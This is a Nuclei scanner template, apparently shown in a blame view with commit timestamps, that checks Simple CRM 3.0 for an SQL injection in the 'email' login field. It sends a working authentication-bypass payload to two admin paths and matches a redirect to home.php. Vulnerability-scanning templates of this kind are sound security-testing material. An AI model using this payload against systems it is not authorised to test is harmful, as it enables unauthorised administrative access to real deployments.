2021-08-15 20:23:38 +00:00
|
|
|
id: simple-crm-sql-injection
|
|
|
|
|
|
|
|
|
|
info:
|
2021-08-15 20:28:00 +00:00
|
|
|
name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass
|
|
|
|
|
author: geeknik
|
2021-08-15 20:23:38 +00:00
|
|
|
severity: critical
|
2021-08-16 08:33:41 +00:00
|
|
|
reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
|
|
|
|
|
tags: sqli,simplecrm,auth-bypass
|
2021-08-15 20:23:38 +00:00
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- method: POST
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/scrm/crm/admin"
|
|
|
|
|
body: "email='+or+2>1+--+&password=&login="
|
|
|
|
|
|
|
|
|
|
- method: POST
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/crm/admin"
|
|
|
|
|
body: "email='+or+2>1+--+&password=&login="
|
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
|
|
|
|
- 200
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- "<script>window.location.href='home.php'</script>"
|
|
|
|
|
part: body
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
2021-08-16 08:33:09 +00:00
|
|
|
- "text/html"
|
2021-08-15 20:23:38 +00:00
|
|
|
part: header
|
